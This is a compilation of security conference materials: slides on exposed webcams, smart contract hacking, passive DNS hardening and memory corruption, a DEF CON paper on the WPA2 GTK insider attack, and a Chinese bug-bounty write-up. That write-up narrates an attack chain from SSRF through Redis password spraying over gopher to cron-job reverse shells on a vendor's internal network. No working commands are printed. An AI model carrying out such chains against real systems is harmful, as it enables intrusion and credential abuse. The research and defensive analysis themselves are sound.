Thursday, July 12, 12
Emergency Telco gear
Thursday, July 12, 12
Emergency Telco gear
Thursday, July 12, 12
wait what?
Thursday, July 12, 12
.. .speakers?
Thursday, July 12, 12
A massive wine cooler
Thursday, July 12, 12
A massive wine cooler
Text
Thursday, July 12, 12
Thinking longer term..
Thursday, July 12, 12
Remember the trending?
Thursday, July 12, 12
Since scanning the
whole internet is
getting easier, we can
take measurements!
Thursday, July 12, 12
How about some
Measurable
Results?
Thursday, July 12, 12
Remember that
Webcam Stuff I did
Back in January?
Thursday, July 12, 12
Lots of public TrendNet
Cameras?
Thursday, July 12, 12
Original Blogpost: Jan 10
My blogpost: Jan 24 (560 cameras)
BBC Article: Feb 7
A retest: April 3 ( 464 cameras)
US Media picks it up: mid April
Second Retest: May 24 ( 465 cameras)
Third Retest: July 12 (490 cameras)
Thursday, July 12, 12
It scales.
Thursday, July 12, 12
I’m working on it..
Thursday, July 12, 12
Wanna stalk me?
atenlabs.com/blog
@viss
Thursday, July 12, 12 | pdf |
Smart Contract Hacking
Konstantinos Karagiannis
CTO, Security Consulting, BT Americas
@KonstantHacker
when transactions aren’t enough
• “The key
component is this
idea of a Turing-
complete
blockchain”
• --Vitalik Buterin
meow—putting that computing to use
smart contracts
billions, or just millions, of reasons
problem isn’t going away
Solidity
dev tools
• .sol files > bytecode > blockchain
• Atom with plugins:
• language-ethereum
• etheratom
• Remix: browser based
oyente and Manticore
MAIAN
basic methodology
• Interview devs
• Review .sol file
• Try compiling
• Dissect code flow
• Run oyente (cross fingers)
• Run Manticore
• Run MAIAN
• Manually check for following vulns…
reentrancy
leave off the first “re-” for savings
reentrancy (and irony) in the dao code
default public – Parity wallet hack
initWallet
execute
Parity multisig wallet hack 2
Parity 2 transactions
not going with the (over)flow
2256 -1
unchecked send in king of the ether
unchecked send
gas limits
withdraw don’t send
withdrawn not sent
encryption
transaction-ordering dependence
transaction-ordering dependence
call-stack depth limit
variable or function ambiguity
odds and ends
• Timestamp dependence
• Business logic flaws
• Separating public/private
data
things might be getting better?
keep in touch
@KonstantHacker | pdf |
Submitted in Defcon 18 2010
WPA Too!
Md Sohail Ahmad, AirTight Networks
[email protected]
Abstract
WPA2 is considered as the most secure configuration for WiFi networks. It is widely used to
secure enterprise and private WiFi networks. Interestingly, it is also being used to secure guest,
municipal and public WiFi networks. In this paper, we present a vulnerability of WPA2 protocol
which can be exploited by a malicious user to attack and compromise legitimate users. We also
present a few attack mitigation techniques which can be used to protect genuine WiFi users.
I.
Introduction
The 802.11i [1] specifies security protocols for WiFi networks. RSN is one of the security
configurations available in 802.11i and popularly known as WPA2. WPA2 supports two types of
authentication- Pres-Shared Key (PSK) and IEEE 802.1x. For data encryption, WPA2 uses AES
though it also supports TKIP. TKIP stands for temporal key integrity protocol and used by old
devices which are compliant to WEP encryption. AES stands for advanced encryption system.
Most of the current generation WiFi devices support AES.
A couple of attacks on WPA/WPA2 authentication and encryption that have been published in the
past are mentioned below:
PSK vulnerability [2]: PSK is vulnerable to eavesdropping and dictionary attack. To solve
PSK vulnerability, it is recommended to use the IEEE 802.1x based authentication.
PEAP vulnerability [3]: A WiFi client’s configuration related vulnerability was identified in
2008. It can be avoided by simply following good practices and by not ignoring certificate
validation check in client wireless configuration.
TKIP vulnerability [4]: TKIP vulnerability allows attacker to guess IP address of the subnet
and then inject few small size frames to cause disruption in the network. Fast re-keying or
AES can be used to fix the vulnerability.
In the next section, we describe attacks based on a vulnerability of WPA2 protocol and discuss its
implications. Finally, we discuss a few solutions to mitigate the attacks.
II.
GTK Vulnerability
In WPA2, two types of keys are used for data encryption – PTK and GTK. PTK stands for
pairwise transient key and it is used to encrypt unicast data traffic. GTK stands for group temporal
key and it is used to encrypt group addressed data traffic. While PTK is derived per association
basis, GTK is randomly generated by AP and sent to all associated clients. GTK is a shared key
and is known to all associated clients.
Submitted in Defcon 18 2010
Figure 1: All clients have same copy of GTK “K1”
The purpose of GTK is to be used as an encryption key in AP and as a decryption key in clients.
A WiFi client never uses GTK to encrypt data frames as all frames from client to AP are unicast
and destined to AP. But a malicious WiFi client can alter its behavior to use GTK to encrypt group
addressed data frames of its own and send to all associated clients.
By altering the role of GTK, a malicious client can inject any type of packet to trick attacks in a
WLAN e.g. ARP cache poisoning attack. Following attacks are possible on a WPA2 secured WiFi
networks:
Attack 1: Stealth ARP cache poisoning/spoofing attack
It allows an attacker to snoop victim’s traffic. Attacker may place himself as a Man-in-the-middle
(MITM) and steal all his sensitive information. Attacker may launch denial of service (DoS) attack
by not serving hosts after poisoning the ARP entry for gateway in all wireless clients.
Figure 2: Stealth ARP poisoning
Step 1: Attacker injects fake ARP packet
to poison client’s cache for gateway.
Step 2: The ARP cache of victim gets
poisoned. For victim, Gateway
MAC is now attacker’s machine
MAC address. Victim’s machine
sends all traffic to attacker.
Step 3: Attacker can either drop traffic
or forward it to actual gateway.
Submitted in Defcon 18 2010
Difference between Normal and Stealth mode ARP poisoning
In normal ARP poisoning [9], injected frames may appear on wire via AP as shown in the figure
below. Chance of being detected by wired monitoring tools is very high.
In stealth mode ARP poisoning, injected frames are invisible to AP, never go on wire. Hence it
can’t be detected by network based ARP cache monitoring tool.
Figure 3: Normal vs Stealth mode ARP poisoning
Attack 2: IP layer targeted attack
To launch targeted attack, IP packet is encapsulated in a group addressed data frames as shown
in the figure 4 below. A WiFi client machine whose IP address matches with the destination IP
address present in the attack packet accept the packet. All other WiFi clients reject the packet.
The technique can be used to trick several TCP and application layer attack in a WPA2 secured
WLAN e.g. TCP reset, TCP indirection, DNS manipulation, Port scanning, malware injection,
privilege escalation etc.
Figure 4: IP packet encapsulated into a group addressed IEEE 802.11 data frame
Submitted in Defcon 18 2010
Replay Attack Detection in WPA2
Replay attack is detected with the help of 48 bit packet number present in all CCMP encrypted
data frames. Steps used to detect a replayed frame are given below:
Attack 3: Wireless DoS attack
GTK vulnerability can also be exploited to launch DoS attack in a WLAN.
To cause DoS, attacker injects a forged group addressed data frame with a large packet number
(PN). All clients present in that network receives forged group addressed data frame and updates
locally cached PN with an attacker injected large PN.
Later on when AP sends group addressed data frames, they are dropped by connected clients as
the PNs present in AP’s injected data frames are less than locally cached PN in clients. The PN
manipulation scenario is shown in the figure 5 below.
Figure 5: Packet Number (PN) manipulation
As a consequence of PN manipulation, broadcast ARP requests never reaches to wireless client. It fails IP
to MAC resolution at the sender. As a results of this IP level communication between sender and receiver
never starts.
1. All clients learn the PN associated with a
GTK at the time of association
2. AP sends a group addressed data frame to
all clients with a new PN
3. If new PN > locally cached PN than
packet is decrypted and after successful
decryption, old PN is updated with new PN
Submitted in Defcon 18 2010
IV.
Attack mitigation
a. Client IDS
Client side IDS such as DecaffeintID [11] or Snort [12] can be used to detect ARP cache
poisoning or any inbound connection or malware injection.
Limitations:
Such software is available for either Windows or Linux running laptops while WPA2
networks are accessed by varieties of client devices such as smartphone, notepad, etc.
(a) DecaffeintID detects ARP cache poisoning
(b) PSPF / Client Isolation
Figure 6: Prevention techniques
b. PSPF or Client isolation [5][6]
The feature restricts peer to peer communication by blocking traffic between two WiFi
clients.
Limitations:
Not all controllers or standalone mode APs have PSPF or Client isolation capability.
The feature has known limitation. It does not work across access points for standalone
mode APs or across controllers for light weight access points.
c. Software based solution: Deprecate GTK
WPA2 vulnerability can be fixed by deprecating the use of GTK. For backward
Compatibility, AP should send randomly generated different GTKs to different clients so
that all associated clients have different copies of GTK all the time.
Limitations
a. Brings down network throughput
b. Requires AP software upgrade
Submitted in Defcon 18 2010
VI.
Conclusion
WPA2 is vulnerable to insider attack. WPA which was introduced as a replacement for WEP is
also vulnerable as the group addressed data is handled the same way as it is handled in WPA2.
This limitation though known to the designers of WPA or WPA2, is not well understood or
appreciated by WiFi users. Our findings presented in this paper show that exploits are possible
using off the shelf tools with minor modifications. Legitimate WiFi users who connect to WPA or
WPA2 enabled WLAN are vulnerable regardless of the type of authentication or encryption used
in the wireless network. In order to provide defense against the insider attack a few solutions
have been proposed. Unfortunately, no alternative to GTK vulnerability exists and hence a
permanent fix is required at the protocol level. Fixing protocol level problem takes time and hence
as an alternative wireless monitoring device e.g. WIPS sensors which are used to detect anomaly
in the wireless traffic can be used to detect insider attack.
References
[1] Task Group I, IEEE P802.11i Draft 10.0. Project IEEE 802.11i, 2004.
[2] Aircrack-ng
www.aircrack-ng.org
[3] PEAP: Pwned Extensible Authentication Protocol
http://www.willhackforsushi.com/presentations/PEAP_Shmoocon2008_Wright_Antoniewicz.pdf
[4]. WPA/WPA2 TKIP Exploit: Tip of the Iceberg?
www.cwnp.com/pdf/TKIPExploit08.pdf
[5]. Cisco’s PSPF or P2P
http://www.cisco.com/en/US/products/hw/wireless/ps430/products_qanda_item09186a00806a4d
a3.shtml
[6] Client isolation
http://www.cisecurity.org/tools2/wireless/CIS_Wireless_Addendum_Linksys.pdf
[7]. The Madwifi Project
http://madwifi-project.org/
[8]. Host AP Driver
http://hostap.epitest.fi/
[9]. ARP Cache Poisoning
http://www.grc.com/nat/arp.htm
[10] Detecting Wireless LAN MAC Address Spoofing
http://forskningsnett.uninett.no/wlan/download/wlan-mac-spoof.pdf
[11]. DecaffeinatID
http://www.irongeek.com/i.php?page=security/decaffeinatid-simple-ids-arpwatch-for-
windows&mode=print
[12] SNORT
http://www.snort.org/
[13]. Wireless Hotspot Security
Submitted in Defcon 18 2010
http://www.timeatlas.com/Reviews/Reviews/Wireless_Hotspot_Security | pdf |
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Passive DNS Hardening
Robert Edmonds
Internet Systems Consortium, Inc.
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
DNS
Passive DNS
ISC SIE
Structure of this talk
▶ Introduction
▶ DNS
▶ Passive DNS
▶ ISC SIE
▶ DNS security issues
▶ Kashpureff poisoning
▶ Kaminsky poisoning
▶ Passive DNS security issues
▶ Record injection
▶ Response spoofing
▶ ISC DNSDB
▶ Architecture
▶ Demos
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
DNS
Passive DNS
ISC SIE
The Domain Name System
▶ “The DNS maps hostnames to IP addresses.”
▶ More generally, it maps (key, type) tuples to a set of
unordered values. again, we can think of the DNS as basically
a multi-value distributed key-value store.
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
DNS
Passive DNS
ISC SIE
Clients, caches, content
▶ Clients request full resolution service from caches.
▶ Caches make zero or more inquiries to DNS content servers
on behalf of clients. Results are cached for a limited time to
serve future client requests.
▶ Content nameservers serve DNS records for zones that have
been delegated to them.
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
DNS
Passive DNS
ISC SIE
DNS Caching Resolvers
gtisc.gatech.edu
Facebook.com
Google.com
amazon.com
.org
.isc.org
.com
.net
Dozens
Millions
Millions
Clients
Content
Query
Response
Query
Response
Query
Response
Query
Response
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
DNS
Passive DNS
ISC SIE
Client-server and inter-server DNS protocols
▶ The DNS is actually two different protocols that share a
common wire format.
▶ The client-to-server protocol spoken between clients and
caches.
▶ The inter-server protocol spoken between caches and content
servers.
▶ Passive DNS focuses on the latter.
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
DNS
Passive DNS
ISC SIE
Passive DNS
▶ Passive DNS replication is a technology invented in 2004 by
Florian Weimer.
▶ Many uses! Malware, e-crime, legitimate Internet services all
use the DNS.
▶ Inter-server DNS messages are captured by sensors and
forwarded to a collection point for analysis.
▶ After being processed, individual DNS records are stored in a
database.
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
DNS
Passive DNS
ISC SIE
DNS Caching Resolvers
gtisc.gatech.edu
Facebook.com
Google.com
amazon.com
.org
.sc.org
.com
.net
Content
Query
Response
DNSDB
Security
Information
Exchange
Passive DNS
Sensor
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
DNS
Passive DNS
ISC SIE
Passive DNS deployments
▶ Florian Weimer’s original dnslogger, first at RUS-CERT,
then at BFK.de (2004–).
▶ Bojan Zdrnja’s dnsparse (2006–).
▶ ISC’s Security Information Exchange (2007–).
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
DNS
Passive DNS
ISC SIE
ISC Security Information Exchange
▶ SIE is a distribution network for different types of security
data.
▶ One of those types of data is passive DNS.
▶ Sensor operators upload batches of data to SIE.
▶ Data is broadcast onto private VLANs.
▶ NMSG format is used to encapsulate data.
▶ Has a number of features which make it very useful for storing
passive DNS data, but won’t be covered further.
▶ See our Google Tech Talk for more information:
http://www.isc.org/community/presentations/video.
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Kashpureff poisoning
Kaminsky poisoning
DNS Security Issues
▶ Passive DNS captures both signed and unsigned data, so
DNSSEC cannot help us.
▶ What security issues are there in the DNS that are relevant to
passive DNS?
▶ Kashpureff poisoning
▶ Kaminsky poisoning
▶ (Actually, just response spoofing in general.)
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Kashpureff poisoning
Kaminsky poisoning
Kashpureff poisoning
▶ Kashpureff poisoning is the name given to a particular type of
DNS cache poisoning.
▶ The attacker runs a content nameserver.
▶ A client is enticed to lookup a domain name under the
attacker’s control.
▶ The cache contacts the attacker’s nameserver.
▶ The attacker’s nameserver provides extra records to the cache.
▶ The extra records are inserted into the cache instead of being
discarded.
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Kashpureff poisoning
Kaminsky poisoning
Kashpureff poisoning example
Q: malicious.example.com.
IN A
?
R: malicious.example.com.
IN NS
www.example.net.
R: www.example.net.
IN A
203.0.113.67
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Kashpureff poisoning
Kaminsky poisoning
Kashpureff poisoning example
Q: malicious.example.com.
IN A
?
R: malicious.example.com.
IN NS
www.example.net.
R: www.example.net.
IN A
203.0.113.67
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Kashpureff poisoning
Kaminsky poisoning
Kashpureff poisoning example
Q: malicious.example.com.
IN A
?
R: malicious.example.com.
IN NS
www.example.net.
R: www.example.net.
IN A
203.0.113.67
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Kashpureff poisoning
Kaminsky poisoning
Kashpureff hardening
▶ 1997: Eugene Kashpureff hijacks the InterNIC website.
▶ BIND 4.9.6 and 8.1.1 introduce hardening against
Kashpureff poisoning.
▶ RFC 2181 is published.
▶ See §5.4.1 “Ranking data” for details.
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Kashpureff poisoning
Kaminsky poisoning
Lack of entropy
▶ 2000: DJB observes that a maximum of only about 31-32 bits
of entropy can protect a UDP DNS query.
▶ Other DNS implementations slow to adopt SPR.
▶ 32 bits of entropy particularly weak for a session ID due to the
birthday attack problem.
▶ Newer protocols use cryptographically secure session IDs with
64, 128, or more bits.
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Kashpureff poisoning
Kaminsky poisoning
Kaminsky poisoning
▶ 2008: Dan Kaminsky notices that the TTL can be bypassed.
▶ Coordinated, multi-vendor patches are released to implement
source port randomization.
▶ SPR makes Kaminsky attacks harder, but not impossible.
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Relevance
Capture stage
Analysis stage
Relevance to passive DNS
▶ Weimer’s 2005 paper notes several problems with verifying
passive DNS data.
▶ Kashpureff and Kaminsky poisoning of “active DNS” have
analogues in passive DNS.
▶ Passive DNS sensors can’t see the DNS cache’s “bailiwick”,
leading to record injection.
▶ Spoofed responses are treated just like normal responses.
▶ A single spoofed response can poison the passive DNS
database!
▶ Goal: make passive DNS at least as reliable as active
DNS.
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Relevance
Capture stage
Analysis stage
Protecting the capture stage against response spoofing
▶ Capture both queries and responses.
▶ Correlate responses with previously seen queries.
▶ The DNS message 9-tuple:
1. Initiator IP address
2. Initiator port
3. Target IP address
4. Target port
5. Internet protocol
6. DNS ID
7. Query name
8. Query type
9. Query class
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Relevance
Capture stage
Analysis stage
nmsg/dnsqr
▶ dnsqr is a message module for ISC’s libnmsg specifically
designed for passive DNS capture.
▶ UDP DNS transactions are classified into three categories:
1. UDP QUERY RESPONSE
2. UDP UNANSWERED QUERY
3. UDP UNSOLICITED RESPONSE
▶ Performs IP reassembly, too!
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Relevance
Capture stage
Analysis stage
Protecting the analysis stage against record injection
▶ Caches internally associate a “bailiwick” with each outgoing
query.
▶ The cache knows what bailiwick to use, because it knows why
it’s sending a particular query.
▶ We have to calculate the bailiwick ourselves.
▶ Protection against record injection requires protection against
spoofed responses.
▶ (Otherwise, an attacker could just spoof the record and the
source IP address of an in-bailiwick nameserver.)
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Relevance
Capture stage
Analysis stage
Passive DNS bailiwick algorithm
▶ Must operate completely passively.
▶ Must provide a boolean true or false for each record.
▶ “For each record name, is the response IP address a
nameserver for the zone that contains or can contain this
name?”
▶ Example: root nameservers can assert knowledge about any
name!
▶ Example: Verisign’s gtld servers can assert knowledge about
any domain name ending in .com or .net.
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Relevance
Capture stage
Analysis stage
Passive DNS bailiwick algorithm
▶ Initialize bailiwick cache with a copy of the root zone.
▶ Cache starts off with knowledge of which servers serve the root
and TLDs.
▶ Find all potential zones that a name could be located in.
▶ Check whether any of the nameservers for those zones are the
nameserver that sent the response.
▶ Each time an NS, A, or AAAA record is verified by the
algorithm, it is inserted into the bailiwick cache.
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Relevance
Capture stage
Analysis stage
Passive DNS bailiwick algorithm example
Name: example.com.
Server: 192.5.6.30
▶ Potential zones:
▶ example.com.
▶ com.
▶ .
▶ Zones in bailiwick cache:
▶ com.
▶ .
▶ Check: example.com./NS? Not found.
▶ Check: com./NS? Found 13 nameservers.
▶ Check: are any of them 192.5.6.30? Yes.
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Relevance
Capture stage
Analysis stage
Passive DNS bailiwick algorithm example
com .
IN
NS
a . gtld −s e r v e r s . net .
a . gtld −s e r v e r s . net .
IN
A
1 9 2 . 5 . 6 . 3 0
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Relevance
Capture stage
Analysis stage
Passive DNS bailiwick algorithm example
; ; QUESTION SECTION :
;www. example . com .
IN
A
; ; AUTHORITY SECTION :
example . com .
172800
IN
NS
a . iana−s e r v e r s . net .
example . com .
172800
IN
NS
b . iana−s e r v e r s . net .
; ;
ADDITIONAL SECTION :
a . iana−s e r v e r s . net .
172800
IN
A
192.0.34.43
b . iana−s e r v e r s . net .
172800
IN
A
193.0.0.236
; ; SERVER:
192.5.6.30#53(192.5.6.30)
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Relevance
Capture stage
Analysis stage
Passive DNS bailiwick algorithm example
; ; QUESTION SECTION :
;www. example . com .
IN
A
; ; ANSWER SECTION :
www. example . com .
172800
IN
A
192.0.32.10
; ; AUTHORITY SECTION :
example . com .
172800
IN
NS
a . iana−s e r v e r s . net .
example . com .
172800
IN
NS
b . iana−s e r v e r s . net .
; ; SERVER:
192.0.34.43#53(192.0.34.43)
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Relevance
Capture stage
Analysis stage
Passive DNS bailiwick algorithm example
Name: www.example.com.
Server: 192.0.34.43
▶ Potential zones:
▶ www.example.com.
▶ example.com.
▶ com.
▶ .
▶ Zones in bailiwick cache:
▶ example.com.
▶ com.
▶ .
▶ Check: www.example.com./NS? Not found.
▶ Check: example.com./NS? Found 2 nameservers.
▶ Check: are any of them 192.0.34.43? Yes.
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Architecture
Examples
DNSDB
▶ DNSDB is a database for storing DNS records.
▶ Data is loaded from passive DNS and zone files.
▶ Individual DNS records are stored in an Apache Cassandra
database.
▶ Offers key-value store distributed across multiple machines.
▶ Good fit for DNS data.
▶ Sustains extremely high write throughput because all writes
are sequential.
▶ Offers a RESTful HTTP API and web search interface.
▶ Database currently consumes about 500 GB out of 27 TB.
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Architecture
Examples
Architecture
▶ Components
▶ Data sources
▶ nmsg-dns-cache
▶ DNS TLD zones (FTP via ZFA programs): com, net, org,
etc.
▶ DNS zones (standard AXFR/IXFR protocol)
▶ Data loaders
▶ Deduplicated passive DNS
▶ Zone file data
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Architecture
Examples
Data source: nmsg-dns-cache
▶ Reads raw DNS responses from passive DNS.
▶ Parses each DNS message into individual DNS RRsets.
▶ Series of filters reduce the total amount of data by about 50%.
▶ RRsets are then inserted into an in-memory cache.
▶ Cache is expired in FIFO order.
▶ When RRsets expire from the cache, they form the final
nmsg-dns-cache output.
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Architecture
Examples
Data source: zone files
▶ gTLD Zone File Access programs: com, net, org, info,
biz, name
▶ AXFR’d zones: isc.org, a few other ”test” zones.
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Architecture
Examples
DNSDB
SIE
nmsg-dns-cache
DNSDB
Passive
DNS Sensor
Passive
DNS Sensor
Passive
DNS Sensor
SIE
Submit
SIE
Submit
SIE
Switch
Fabric
Filter
Dedupe
FTP
Collector
Web
Interface
HTTP API
Query
Response
Query
Response
AXFR/IXFR
Collector
ZFA
.COM
ZFA
.BIZ
ZFA
.ORG
ZFA
ISC.ORG
DNS
Any other
DNS
GTISC.GATECH.EDU
DNS
Filtered, Deduped
Data VLAN
Raw
Data VLAN
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Architecture
Examples
Example #1: *.google.com
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Architecture
Examples
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Architecture
Examples
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Architecture
Examples
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Architecture
Examples
Robert Edmonds
Passive DNS Hardening
Introduction
DNS Security Issues
Passive DNS hardening
DNSDB
Architecture
Examples
Robert Edmonds
Passive DNS Hardening | pdf |
0x00 前⾔
有技术交流或渗透测试培训需求的朋友欢迎联系QQ/VX-547006660,
需要代码审计、渗透测试、红蓝对抗⽹络安全相关业务可以联系我司
2000⼈⽹络安全交流群,欢迎⼤佬们来交流 群号820783253
最近BugBounty挖了不少,但⼤多数都是有⼿就⾏的漏洞,需要动脑⼦的实属罕⻅
⽽今天就遇到了⼀个⾮常好的案例,故作此⽂
0x01 对⽬录批量FUZZ,发现⼀处隐蔽接⼝
挖某⼤⼚已经挖了快两个周了,期间因为公司业务⽐较繁忙,最近⼀直没挖。
但是⼀直在⽤ffuf挂着字典对⼚商资产进⾏批量⽬录扫描,今天上服务器看了下扫描结果,就出货了
接⼝地址为:https://xxx.xxxx.com/xxxx/start
我们直接对其进⾏访问
发现该接⼝给我们提供了⼀些可以使⽤的接⼝链接
我们逐个测试拼接接⼝后,发现⼀个名为face_xxxx的接⼝有戏
0x02 FUZZ传参格式+参数
访问接⼝,提示Method Not Allow,405错误,那么很显然,我们得换POST传参
POST随便传个参过去,发现接⼝提示"Request error, content-type was unsupported"
很好,继续FUZZ content-type header(记得把payload_processing⾃动编码给关掉)
FUZZ出来application/json的content-type头可⽤,那么很简单了,构造JSON数据,继续FUZZ JSON数据参数
0x03 SSRF⽆脑到⼿
参数为image_url,稍有经验的朋友就可以借此判断出,很可能这个参数是加载远程图⽚的
直接进⾏SSRF测试
服务器收到了请求,经测试gopher,dict,http等常规协议都可以使⽤~
之前通过各种域名⼆级⽬录或根⽬录的spring泄露,下载heapdump,OQL调试出redis明⽂密码
收集了不少该⼚商内⽹redis的ip和密码,也了解到该⼚商的内⽹⽹段
尝试利⽤本处SSRF完全可以批量对内⽹Redis进⾏密码喷洒+反弹shell对边界进⾏突破
0x04 利⽤gopher协议对内⽹脆弱⽹段批量Redis密码喷洒反弹
Shell
普及⼀个知识:与未授权直接访问的redis不同,加⼊密码认证的redis在命令⾏链接时会多⼀个-a参数指定密码
如图所示如果不传参密码,则⽆法执⾏任何redis指令
⽽加⼊密码认证后redis,在整个RESQ协议流量中表现如下
认证过程中会多⼀个Auth
写脚本来构造gopher数据,注意把这块Auth加上,后续常规操作写计划任务反弹SHELL
利⽤上⾯挖掘到的SSRF点,配合之前⾃⼰收集到的内⽹redis密码和脆弱⽹段
直接通过intruder批量跑内⽹的脆弱⽹段redis,进⾏密码喷洒,喷洒⼀但成功,则会写⼊计划任务
最终功夫不负有⼼⼈,在⼀个⽹段,弹回来了⼗⼏个Shell。。。
⼚商的内⽹Redis主机还能出⽹,属实是内⽹安全做的稀烂了。
0x04 后⾔
这个洞是在平安夜挖到的~算是圣诞贺礼啦 | pdf |
Drinking from LETHE:
New methods of exploiting and mitigating
memory corruption vulnerabilities
Daniel Selifonov
DEF CON 23
August 7, 2015
Show of Hands
1. Have you written programs in C or C++?
2. Have you implemented a classic stack smash
exploit?
3. … a return-to-libc or return-oriented-
programming exploit?
4. … a return-to-libc or ROP exploit that used
memory disclosure or info leaks?
Motivations
● Software is rife with
memory corruption
vulnerabilities
● Most memory corruption
vulnerabilities are directly
applicable to code
execution exploits
● And there's no end in
sight...
Motivations (II)
● Industrialized
ecosystem of
vulnerability
discovery and
brokering
weaponized exploits
● Little of this discovery
process feeds into
fixes...
The other AFL
Motivations (III)
● State actor (e.g. NSA
Tailored Access
Operations group)
budgets: ≈ $∞
● Bug bounties just
drive up prices
● Target supply, not
demand for exploits...
The Plan
● Sever the path between
vulnerability and
(reliable) exploit
● Why do programmers
keep hitting this
fundamental blindspot?
● Defenses are born in
light of attack strategies
Memory Safety
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
Memory Safety
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
Memory Safety
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to C runtime exit>
Memory Safety
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to C runtime exit>
Memory Safety
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to C runtime exit>
<return address to >
Memory Safety
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to C runtime exit>
<return address to >
Memory Safety
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to C runtime exit>
<return address to >
<4 bytes for 'int a'>
Memory Safety
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to C runtime exit>
<return address to >
<4 bytes for 'int a'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
Memory Safety
#include <stdio.h>
int main() {
foo();
bar(11, 12);
return 0;
}
void foo() {
int a;
char b[23];
gets(b);
printf("Hey %s!\n",b);
}
int bar(int x, int y) {
return x + y;
}
<return address to C runtime exit>
<return address to >
<4 bytes for 'int a'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
<4 bytes for 'char b[]'>
Memory Safety
#include <stdio.h>
int main() {
foo();
